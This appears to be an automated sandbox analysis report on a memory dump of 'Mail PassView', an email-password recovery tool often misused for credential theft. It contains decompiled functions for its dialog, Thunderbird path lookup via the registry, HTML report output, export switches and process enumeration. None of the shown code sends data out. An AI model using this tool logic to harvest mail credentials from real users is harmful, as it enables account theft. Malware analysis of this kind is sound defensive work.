Instruction Fuzzy Hash: C9B1DE71108341AFD710DFA8C985A6BBBE9FF88704F008A2DF699D2260D775E814CF16

Uniqueness

Uniqueness Score: -1.00%

Function 004010E5, Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E004010E5(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t62;
				void* _t67;
				struct HWND__* _t68;
				struct HWND__* _t69;
				void* _t72;
				unsigned int _t73;
				struct HWND__* _t75;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				unsigned int _t83;
				struct HWND__* _t85;
				struct HWND__* _t87;
				struct HWND__* _t88;
				struct tagPOINT _t94;
				struct tagPOINT _t96;
				void* _t102;
				void* _t113;

				_t102 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t113 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x417348;
					if(__eflags != 0) {
						SetDlgItemTextA( *(__ecx + 4), 0x3ee, 0x417348);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 4), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t113 + 4), 0x3ee), 0);
					}
					SetWindowTextA( *(_t113 + 4), "Mail PassView");
					SetDlgItemTextA( *(_t113 + 4), 0x3ea, _t113 + 0xc);
					SetDlgItemTextA( *(_t113 + 4), 0x3ec, _t113 + 0x10b);
					E00401085(_t113, __eflags);
					E00406491(_t102,  *(_t113 + 4));
					goto L29;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t62 = _a8;
						__eflags = _t62 - 1;
						if(_t62 != 1) {
							goto L29;
						} else {
							__eflags = _t62 >> 0x10;
							if(_t62 >> 0x10 != 0) {
								goto L29;
							} else {
								EndDialog( *(__ecx + 4), 1);
								DeleteObject( *(_t113 + 0x20c));
								goto L8;
							}
						}
					} else {
						_t67 = _t61 - 0x27;
						if(_t67 == 0) {
							_t68 = GetDlgItem( *(__ecx + 4), 0x3ec);
							__eflags = _a12 - _t68;
							if(_a12 != _t68) {
								__eflags =  *0x417388;
								if( *0x417388 == 0) {
									goto L29;
								} else {
									_t69 = GetDlgItem( *(_t113 + 4), 0x3ee);
									__eflags = _a12 - _t69;
									if(_a12 != _t69) {
										goto L29;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t72 = _t67 - 0xc8;
							if(_t72 == 0) {
								_t73 = _a12;
								_t94 = _t73 & 0x0000ffff;
								_v12.x = _t94;
								_v12.y = _t73 >> 0x10;
								_t75 = GetDlgItem( *(__ecx + 4), 0x3ec);
								_push(_v12.y);
								_a8 = _t75;
								_t76 = ChildWindowFromPoint( *(_t113 + 4), _t94);
								__eflags = _t76 - _a8;
								if(_t76 != _a8) {
									__eflags =  *0x417388;
									if( *0x417388 == 0) {
										goto L29;
									} else {
										_t77 = GetDlgItem( *(_t113 + 4), 0x3ee);
										_push(_v12.y);
										_t78 = ChildWindowFromPoint( *(_t113 + 4), _v12.x);
										__eflags = _t78 - _t77;
										if(_t78 != _t77) {
											goto L29;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorA( *0x416b94, 0x67));
									goto L8;
								}
							} else {
								if(_t72 != 0) {
									L29:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t83 = _a12;
									_t96 = _t83 & 0x0000ffff;
									_v12.x = _t96;
									_v12.y = _t83 >> 0x10;
									_t85 = GetDlgItem( *(__ecx + 4), 0x3ec);
									_push(_v12.y);
									_a8 = _t85;
									if(ChildWindowFromPoint( *(_t113 + 4), _t96) != _a8) {
										__eflags =  *0x417388;
										if( *0x417388 == 0) {
											goto L29;
										} else {
											_t87 = GetDlgItem( *(_t113 + 4), 0x3ee);
											_push(_v12.y);
											_t88 = ChildWindowFromPoint( *(_t113 + 4), _v12);
											__eflags = _t88 - _t87;
											if(_t88 != _t87) {
												goto L29;
											} else {
												_push(0x417388);
												goto L7;
											}
										}
									} else {
										_push(_t113 + 0x10b);
										L7:
										_push( *(_t113 + 4));
										E00406523();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}

0x004010e5
0x004010e8
0x004010e9
0x004010ed
0x004010f5
0x004010f7
0x004012b2
0x004012b9
0x004012f4
0x004012bb
0x004012d4
0x004012e3
0x004012e3
0x00401302
0x0040131a
0x0040132b
0x0040132d
0x00401335
0x00000000
0x004010fd
0x004010fd
0x004010fe
0x0040127d
0x00401280
0x00401284
0x00000000
0x0040128a
0x0040128d
0x00401290
0x00000000
0x00401296
0x0040129b
0x004012a7
0x00000000
0x004012a7
0x00401290
0x00401104
0x00401104
0x00401107
0x0040122e
0x00401230
0x00401233
0x0040125b
0x00401262
0x00000000
0x00401268
0x00401270
0x00401272
0x00401275
0x00000000
0x0040127b
0x00000000
0x0040127b
0x00401275
0x00401235
0x00401235
0x0040123a
0x00401248
0x00401250
0x00401250
0x0040110d
0x0040110d
0x00401112
0x004011a2
0x004011ab
0x004011b9
0x004011bc
0x004011bf
0x004011c1
0x004011c4
0x004011d1
0x004011d3
0x004011d6
0x004011f2
0x004011f9
0x00000000
0x004011ff
0x00401207
0x00401209
0x00401214
0x00401216
0x00401218
0x00000000
0x0040121e
0x00000000
0x0040121e
0x00401218
0x004011d8
0x004011d8
0x004011e7
0x00000000
0x004011e7
0x00401118
0x0040111a
0x0040133b
0x0040133b
0x0040133b
0x00401120
0x00401120
0x00401129
0x00401137
0x0040113a
0x0040113d
0x0040113f
0x00401142
0x00401154
0x0040116f
0x00401176
0x00000000
0x0040117c
0x00401184
0x00401186
0x00401191
0x00401193
0x00401195
0x00000000
0x0040119b
0x0040119b
0x00000000
0x0040119b
0x00401195
0x00401156
0x0040115c
0x0040115d
0x0040115d
0x00401160
0x00401167
0x00401169
0x00401169
0x00401154
0x0040111a
0x00401112
0x00401107
0x004010fe
0x00401341

APIs

GetDlgItem.USER32 ref: 0040113D
ChildWindowFromPoint.USER32 ref: 0040114F
GetDlgItem.USER32 ref: 00401184
ChildWindowFromPoint.USER32 ref: 00401191
GetDlgItem.USER32 ref: 004011BF
ChildWindowFromPoint.USER32 ref: 004011D1
LoadCursorA.USER32 ref: 004011E0
SetCursor.USER32(00000000,?,?), ref: 004011E7
GetDlgItem.USER32 ref: 00401207
ChildWindowFromPoint.USER32 ref: 00401214
GetDlgItem.USER32 ref: 0040122E
SetBkMode.GDI32(?,00000001), ref: 0040123A
SetTextColor.GDI32(?,00C00000), ref: 00401248
GetSysColorBrush.USER32(0000000F), ref: 00401250
GetDlgItem.USER32 ref: 00401270
EndDialog.USER32(?,00000001), ref: 0040129B
DeleteObject.GDI32(?), ref: 004012A7
GetDlgItem.USER32 ref: 004012CB
ShowWindow.USER32(00000000), ref: 004012D4
GetDlgItem.USER32 ref: 004012E0
ShowWindow.USER32(00000000), ref: 004012E3
SetDlgItemTextA.USER32 ref: 004012F4
SetWindowTextA.USER32(?,Mail PassView), ref: 00401302
SetDlgItemTextA.USER32 ref: 0040131A
SetDlgItemTextA.USER32 ref: 0040132B

Strings

Mail PassView, xrefs: 004012FA

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObject
String ID: Mail PassView
API String ID: 3628558512-272225179
Opcode ID: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
Instruction ID: a5e01e197ecdabf9e6bdb75eaf1794657044b10619e6b9182d208ef804a260cb
Opcode Fuzzy Hash: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
Instruction Fuzzy Hash: 68518130044248BFEB259F60DE85EAE7BB5EB04700F10853AFA56E65F0C7759D61EB08

Uniqueness

Uniqueness Score: -1.00%

Function 0040F435, Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 168
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040F435(CHAR* __eax) {
				void* _v8;
				int _v12;
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void _v787;
				char _v788;
				void _v1051;
				char _v1052;
				void _v2075;
				char _v2076;
				void* __esi;
				void* _t45;
				void* _t59;
				char* _t60;
				char* _t71;
				char* _t75;
				void* _t84;
				CHAR* _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				void* _t93;

				_t89 = __eax;
				_v1052 = 0;
				memset( &_v1051, 0, 0x104);
				_v788 = 0;
				memset( &_v787, 0, 0xff);
				 *_t89 = 0;
				_t45 = E0040EB3F(0x80000002, "SOFTWARE\\Mozilla",  &_v8);
				_t91 = _t90 + 0x24;
				if(_t45 != 0) {
					L12:
					strcpy(_t89,  &_v1052);
					if( *_t89 == 0) {
						ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t89, 0x104);
						if(E0040F3BA(_t89) == 0) {
							 *_t89 = 0;
						}
						if( *_t89 == 0) {
							E00406172(_t89);
							if(E0040F3BA(_t89) == 0) {
								 *_t89 = 0;
							}
							if( *_t89 == 0) {
								GetCurrentDirectoryA(0x104, _t89);
								if(E0040F3BA(_t89) == 0) {
									 *_t89 = 0;
								}
							}
						}
					}
					return 0 |  *_t89 != 0x00000000;
				} else {
					_v268 = 0;
					memset( &_v267, 0, 0xff);
					_v12 = 0;
					_t59 = E0040EC05(_v8, 0,  &_v268);
					_t92 = _t91 + 0x18;
					while(_t59 == 0) {
						_push(7);
						_t60 =  &_v268;
						_push("mozilla");
						_push(_t60);
						L00411642();
						_t93 = _t92 + 0xc;
						if(_t60 == 0) {
							_v532 = 0;
							memset( &_v531, 0, 0x104);
							_v2076 = 0;
							memset( &_v2075, 0, 0x3ff);
							_push( &_v268);
							_push("%s\\bin");
							_push(0x3ff);
							_push( &_v2076);
							L00411648();
							E0040EBC1(_t84, _v8,  &_v2076, "PathToExe",  &_v532, 0x104);
							_t71 =  &_v532;
							_push(0x5c);
							_push(_t71);
							L0041164E();
							_t93 = _t93 + 0x44;
							if(_t71 != 0) {
								 *_t71 = 0;
							}
							if(_v532 != 0 && E0040F3BA( &_v532) != 0) {
								_push( &_v788);
								_t75 =  &_v268;
								L004115C4();
								_t84 = _t75;
								if(_t75 > 0) {
									strcpy( &_v1052,  &_v532);
									strcpy( &_v788,  &_v268);
									_t93 = _t93 + 0x10;
								}
							}
						}
						_v12 = _v12 + 1;
						_t59 = E0040EC05(_v8, _v12,  &_v268);
						_t92 = _t93 + 0xc;
					}
					RegCloseKey(_v8);
					goto L12;
				}
			}

0x0040f449
0x0040f453
0x0040f459
0x0040f46b
0x0040f471
0x0040f484
0x0040f486
0x0040f48b
0x0040f490
0x0040f5e6
0x0040f5ee
0x0040f5f7
0x0040f600
0x0040f60e
0x0040f610
0x0040f610
0x0040f614
0x0040f616
0x0040f623
0x0040f625
0x0040f625
0x0040f629
0x0040f62d
0x0040f63b
0x0040f63d
0x0040f63d
0x0040f63b
0x0040f629
0x0040f614
0x0040f64a
0x0040f496
0x0040f4a3
0x0040f4a9
0x0040f4b9
0x0040f4bc
0x0040f4c1
0x0040f5d5
0x0040f4c9
0x0040f4cb
0x0040f4d1
0x0040f4d6
0x0040f4d7
0x0040f4dc
0x0040f4e1
0x0040f4f0
0x0040f4f6
0x0040f508
0x0040f50e
0x0040f519
0x0040f51a
0x0040f525
0x0040f52a
0x0040f52b
0x0040f547
0x0040f54c
0x0040f552
0x0040f554
0x0040f555
0x0040f55a
0x0040f55f
0x0040f561
0x0040f561
0x0040f569
0x0040f581
0x0040f582
0x0040f589
0x0040f591
0x0040f592
0x0040f5a2
0x0040f5b5
0x0040f5ba
0x0040f5ba
0x0040f592
0x0040f569
0x0040f5bd
0x0040f5cd
0x0040f5d2
0x0040f5d2
0x0040f5e0
0x00000000
0x0040f5e0

APIs

memset.MSVCRT ref: 0040F459
memset.MSVCRT ref: 0040F471

Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52

memset.MSVCRT ref: 0040F4A9

Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28

_mbsnbicmp.MSVCRT ref: 0040F4D7
memset.MSVCRT ref: 0040F4F6
memset.MSVCRT ref: 0040F50E
_snprintf.MSVCRT ref: 0040F52B
_mbsrchr.MSVCRT ref: 0040F555
_mbsicmp.MSVCRT ref: 0040F589
strcpy.MSVCRT(?,?,?), ref: 0040F5A2
strcpy.MSVCRT(?,?,?,?,?), ref: 0040F5B5
RegCloseKey.ADVAPI32(0040F699), ref: 0040F5E0
strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F5EE
ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 0040F600
GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F62D

Strings

%s\bin, xrefs: 0040F51A
SOFTWARE\Mozilla, xrefs: 0040F47A
PathToExe, xrefs: 0040F538
%programfiles%\Mozilla Thunderbird, xrefs: 0040F5FB
mozilla, xrefs: 0040F4D1

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memset$strcpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
String ID: %programfiles%\Mozilla Thunderbird$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
API String ID: 3269028891-3267283505
Opcode ID: 53b4df83feeff12aad6ea8c9c33e414d6f76a23fb296a6d720f7d1efbd9f2591
Instruction ID: bd4ffbb0b4c73fbe97c341744dc0c87608cd01b58ef3e3991875b3aaf34b88fb
Opcode Fuzzy Hash: 53b4df83feeff12aad6ea8c9c33e414d6f76a23fb296a6d720f7d1efbd9f2591
Instruction Fuzzy Hash: 5251A77284425DBADB31D7A18C46EDA7ABC9F14344F0404FBF645E2152EA788FC98B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040F126, Relevance: 27.1, APIs: 12, Strings: 6, Instructions: 101
stringCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040F126(void* __edi, char* _a4, char* _a8) {
				int _v8;
				void _v263;
				char _v264;
				void _v519;
				char _v520;
				intOrPtr _t32;
				void* _t58;
				char* _t60;
				void* _t61;
				void* _t62;

				_t58 = __edi;
				_v264 = 0;
				memset( &_v263, 0, 0xfe);
				_v520 = 0;
				memset( &_v519, 0, 0xfe);
				_t62 = _t61 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__edi + 4)) == 0xffffffff &&  *((intOrPtr*)(__edi + 8)) <= 0) {
					_v8 = 0;
				}
				_t60 = _a4;
				 *_t60 = 0;
				if(_v8 != 0) {
					strcpy(_t60, "<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						sprintf( &_v264, " size=\"%d\"", _t32);
						strcat(_t60,  &_v264);
						_t62 = _t62 + 0x14;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						sprintf( &_v264, " color=\"#%s\"", E0040F071(_t33,  &_v520));
						strcat(_t60,  &_v264);
					}
					strcat(_t60, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					strcat(_t60, "<b>");
				}
				strcat(_t60, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					strcat(_t60, "</b>");
				}
				if(_v8 != 0) {
					strcat(_t60, "</font>");
				}
				return _t60;
			}

0x0040f126
0x0040f141
0x0040f147
0x0040f155
0x0040f15b
0x0040f160
0x0040f167
0x0040f16e
0x0040f175
0x0040f175
0x0040f17b
0x0040f17e
0x0040f180
0x0040f188
0x0040f18d
0x0040f194
0x0040f1a3
0x0040f1b0
0x0040f1b5
0x0040f1b5
0x0040f1b8
0x0040f1be
0x0040f1da
0x0040f1e7
0x0040f1ec
0x0040f1f5
0x0040f1fb
0x0040f1ff
0x0040f207
0x0040f20d
0x0040f212
0x0040f21c
0x0040f224
0x0040f22a
0x0040f22e
0x0040f236
0x0040f23c
0x0040f242

APIs

memset.MSVCRT ref: 0040F147
memset.MSVCRT ref: 0040F15B
strcpy.MSVCRT(?,<font,?,?,?,?,?), ref: 0040F188
sprintf.MSVCRT ref: 0040F1A3
strcat.MSVCRT(?,?,?, size="%d",?,?,?,?,?,?), ref: 0040F1B0
sprintf.MSVCRT ref: 0040F1DA
strcat.MSVCRT(?,?,?, color="#%s",00000000,?,?,?,?,?,?,?), ref: 0040F1E7
strcat.MSVCRT(?,00413DF4,?,?,?,?,?), ref: 0040F1F5
strcat.MSVCRT(?,,?,?,?,?,?), ref: 0040F207
strcat.MSVCRT(?,00409631,?,?,?,?,?), ref: 0040F212
strcat.MSVCRT(?,,?,?,?,?,?), ref: 0040F224
strcat.MSVCRT(?,,?,?,?,?,?), ref: 0040F236

Strings

, xrefs: 0040F21E
, xrefs: 0040F201
size="%d", xrefs: 0040F19D
<font, xrefs: 0040F182
color="#%s", xrefs: 0040F1D4
, xrefs: 0040F230

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: strcat$memsetsprintf$strcpy
String ID: color="#%s"$ size="%d"$$$$<font
API String ID: 1662040868-1996832678
Opcode ID: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
Instruction ID: 418722c3eca89b157b40b8f143ba28d640e3e929850bbea17599129c1cdb8299
Opcode Fuzzy Hash: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
Instruction Fuzzy Hash: 3F31D5B2841615BAC720AB55ED82DCAB36C9F10364F6041BFF215B31C2DA7C9FC48B98

Uniqueness

Uniqueness Score: -1.00%

Function 00409482, Relevance: 25.7, APIs: 10, Strings: 7, Instructions: 182
stringCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00409482(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v79;
				char _v80;
				void _v131;
				char _v132;
				void _v183;
				char _v184;
				char _v236;
				void _v491;
				char _v492;
				void* __edi;
				void* _t83;
				void* _t100;
				char* _t103;
				intOrPtr* _t120;
				signed int _t121;
				char _t139;
				signed int _t152;
				signed int _t153;
				signed int _t156;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t120 = __ebx;
				_v492 = 0;
				memset( &_v491, 0, 0xfe);
				_t121 = 0xc;
				memcpy( &_v236, "<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t121 << 2);
				asm("movsb");
				_t156 = 0;
				_v132 = 0;
				memset( &_v131, 0, 0x31);
				_v184 = 0;
				memset( &_v183, 0, 0x31);
				_v80 = 0;
				memset( &_v79, 0, 0x31);
				_t160 = _t158 + 0x3c;
				_t83 =  *((intOrPtr*)( *__ebx + 0x10))();
				_v12 =  *((intOrPtr*)(__ebx + 0x1b4));
				if(_t83 != 0xffffffff) {
					sprintf( &_v132, " bgcolor=\"%s\"", E0040F071(_t83,  &_v492));
					_t160 = _t160 + 0x14;
				}
				E00405EFD(_a4, "<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t156;
				if( *((intOrPtr*)(_t120 + 0x20)) > _t156) {
					while(1) {
						_t152 =  *( *((intOrPtr*)(_t120 + 0x24)) + _v8 * 4);
						if( *((intOrPtr*)((_t152 << 4) +  *((intOrPtr*)(_t120 + 0x34)) + 4)) != _t156) {
							strcpy( &_v80, " nowrap");
						}
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _t156;
						_t157 = _a8;
						 *((intOrPtr*)( *_t120 + 0x30))(5, _v8, _t157,  &_v28);
						E0040F071(_v28,  &_v184);
						E0040F09D( *((intOrPtr*)( *_t157))(_t152,  *(_t120 + 0x4c)),  *(_t120 + 0x50));
						 *((intOrPtr*)( *_t120 + 0x48))( *(_t120 + 0x50), _t157, _t152);
						_t100 =  *((intOrPtr*)( *_t120 + 0x14))();
						_t153 = _t152 * 0x14;
						if(_t100 == 0xffffffff) {
							strcpy( *(_t120 + 0x54),  *(_t153 + _v12 + 0x10));
						} else {
							_push( *(_t153 + _v12 + 0x10));
							_push(E0040F071(_t100,  &_v492));
							sprintf( *(_t120 + 0x54), "<font color=\"%s\">%s</font>");
							_t160 = _t160 + 0x10;
						}
						_t103 =  *(_t120 + 0x50);
						_t139 =  *_t103;
						if(_t139 == 0 || _t139 == 0x20) {
							strcat(_t103, "&nbsp;");
						}
						E0040F126( &_v28,  *((intOrPtr*)(_t120 + 0x58)),  *(_t120 + 0x50));
						sprintf( *(_t120 + 0x4c),  &_v236,  &_v132,  *(_t120 + 0x54),  &_v184,  &_v80,  *((intOrPtr*)(_t120 + 0x58)));
						E00405EFD(_a4,  *(_t120 + 0x4c));
						_t160 = _t160 + 0x2c;
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t120 + 0x20))) {
							goto L14;
						}
						_t156 = 0;
					}
				}
				L14:
				E00405EFD(_a4, "</table><p>");
				return E00405EFD(_a4, 0x412b1c);
			}

0x00409482
0x0040949b
0x004094a2
0x004094a9
0x004094b5
0x004094b7
0x004094ba
0x004094c1
0x004094c5
0x004094d4
0x004094db
0x004094e7
0x004094eb
0x004094f2
0x004094f7
0x00409503
0x00409506
0x0040951f
0x00409524
0x00409524
0x0040952f
0x00409539
0x0040953c
0x00409546
0x0040954c
0x0040955b
0x00409566
0x0040956c
0x0040956f
0x00409573
0x00409577
0x0040957f
0x00409582
0x0040958d
0x0040959a
0x004095ae
0x004095bc
0x004095c3
0x004095c6
0x004095cc
0x00409601
0x004095ce
0x004095d1
0x004095e4
0x004095ed
0x004095f2
0x004095f2
0x00409608
0x0040960b
0x0040960f
0x0040961c
0x00409622
0x0040962c
0x00409650
0x0040965b
0x00409660
0x00409663
0x0040966c
0x00000000
0x00000000
0x00409544
0x00409544
0x00409546
0x00409672
0x0040967a
0x00409692

APIs

memset.MSVCRT ref: 004094A2
memset.MSVCRT ref: 004094C5
memset.MSVCRT ref: 004094DB
memset.MSVCRT ref: 004094EB
sprintf.MSVCRT ref: 0040951F
strcpy.MSVCRT(00000000, nowrap), ref: 00409566
sprintf.MSVCRT ref: 004095ED
strcat.MSVCRT(?, ), ref: 0040961C

Part of subcall function 0040F071: sprintf.MSVCRT ref: 0040F090

strcpy.MSVCRT(?,?), ref: 00409601
sprintf.MSVCRT ref: 00409650

Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,Mxt,00000000,?,?,004092ED,00000001,00412B1C,74784DE0), ref: 00405F17

Strings

bgcolor="%s", xrefs: 00409519
<table border="1" cellpadding="5">, xrefs: 00409527
%s, xrefs: 004095E5
</table>, xrefs: 00409672
 , xrefs: 00409616
nowrap, xrefs: 00409560
<tr><td%s nowrap>%s<td bgcolor=#%s%s>%s, xrefs: 004094AA

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memsetsprintf$strcpy$FileWritestrcatstrlen
String ID: bgcolor="%s"$ nowrap$ $</table>$%s$<table border="1" cellpadding="5">$<tr><td%s nowrap>%s<td bgcolor=#%s%s>%s
API String ID: 2822972341-601624466
Opcode ID: ca9a12e501fe1fbd997685680bd2bfae0b12254e9316b678fa6584ad6f8df2c7
Instruction ID: 52fdeb1f016046010361db54033fcb762b78bd0ac31642afda0bfecd98a661c0
Opcode Fuzzy Hash: ca9a12e501fe1fbd997685680bd2bfae0b12254e9316b678fa6584ad6f8df2c7
Instruction Fuzzy Hash: 2C619E32900218AFCF15EF59CC86EDE7B79EF04314F1005AAF905AB1E2DB399A85DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040B841, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040B841(signed int __eax, void* __esi) {
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_push("/shtml");
				L004115B2();
				if(__eax != 0) {
					_push("/sverhtml");
					L004115B2();
					if(__eax != 0) {
						_push("/sxml");
						L004115B2();
						if(__eax != 0) {
							_push("/stab");
							L004115B2();
							if(__eax != 0) {
								_push("/scomma");
								L004115B2();
								if(__eax != 0) {
									_push("/stabular");
									L004115B2();
									if(__eax != 0) {
										_push("/skeepass");
										L004115C4();
										asm("sbb eax, eax");
										return ( ~__eax & 0xfffffff8) + 8;
									} else {
										_t5 = 3;
										return _t5;
									}
								} else {
									_t6 = 7;
									return _t6;
								}
							} else {
								_t7 = 2;
								return _t7;
							}
						} else {
							_t8 = 6;
							return _t8;
						}
					} else {
						_t9 = 5;
						return _t9;
					}
				} else {
					_t10 = 4;
					return _t10;
				}
			}

0x0040b842
0x0040b847
0x0040b850
0x0040b857
0x0040b85c
0x0040b865
0x0040b86c
0x0040b871
0x0040b87a
0x0040b881
0x0040b886
0x0040b88f
0x0040b896
0x0040b89b
0x0040b8a4
0x0040b8ab
0x0040b8b0
0x0040b8b9
0x0040b8c0
0x0040b8c5
0x0040b8cc
0x0040b8d6
0x0040b8bb
0x0040b8bd
0x0040b8be
0x0040b8be
0x0040b8a6
0x0040b8a8
0x0040b8a9
0x0040b8a9
0x0040b891
0x0040b893
0x0040b894
0x0040b894
0x0040b87c
0x0040b87e
0x0040b87f
0x0040b87f
0x0040b867
0x0040b869
0x0040b86a
0x0040b86a
0x0040b852
0x0040b854
0x0040b855
0x0040b855

APIs

_stricmp.MSVCRT(/shtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B847
_stricmp.MSVCRT(/sverhtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B85C

Strings

/sxml, xrefs: 0040B86C
/scomma, xrefs: 0040B896
/stabular, xrefs: 0040B8AB
/stab, xrefs: 0040B881
/skeepass, xrefs: 0040B8C0
/shtml, xrefs: 0040B842
/sverhtml, xrefs: 0040B857

Memory Dump Source

Source File: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.514016572.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _stricmp
String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
API String ID: 2884411883-1959339147
Opcode ID: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
Instruction ID: 4e6abd9895fa0fe71fc14c80fe1cf8958250247b4a97c707517fcc1bdd8d2f83
Opcode Fuzzy Hash: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
Instruction Fuzzy Hash: AD011A7328931038F82925662C17FC30A8ACBD1BBBF30856BF606E41E5EF5DA5C0506D

Uniqueness

Uniqueness Score: -1.00%

Function 0040E0DA, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E0DA() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t4;

				if( *0x417518 != 0) {
					return _t1;
				}
				_t2 = LoadLibraryA("psapi.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t4, "GetModuleBaseNameA");
					 *0x416fec = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "EnumProcessModules");
						 *0x416fe4 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "GetModuleFileNameExA");
							 *0x416fdc = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "EnumProcesses");
								 *0x41710c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t4, "GetModuleInformation");
									 *0x416fe8 = _t2;
									if(_t2 != 0) {
										 *0x417518 = 1;
									}
								}
							}
						}
					}
					if( *0x417518 == 0) {
						_t2 = FreeLibrary(_t4);
					}
					goto L10;
				}
			}

0x0040e0e1
0x0040e171
0x0040e171
0x0040e0ed
0x0040e0f3
0x0040e0f7
0x0040e170
0x00000000
0x0040e0f9
0x0040e106
0x0040e10a
0x0040e10f
0x0040e117
0x0040e11b
0x0040e120
0x0040e128
0x0040e12c
0x0040e131
0x0040e139
0x0040e13d
0x0040e142
0x0040e14a
0x0040e14e
0x0040e153
0x0040e155
0x0040e155
0x0040e153
0x0040e142
0x0040e131
0x0040e120
0x0040e167
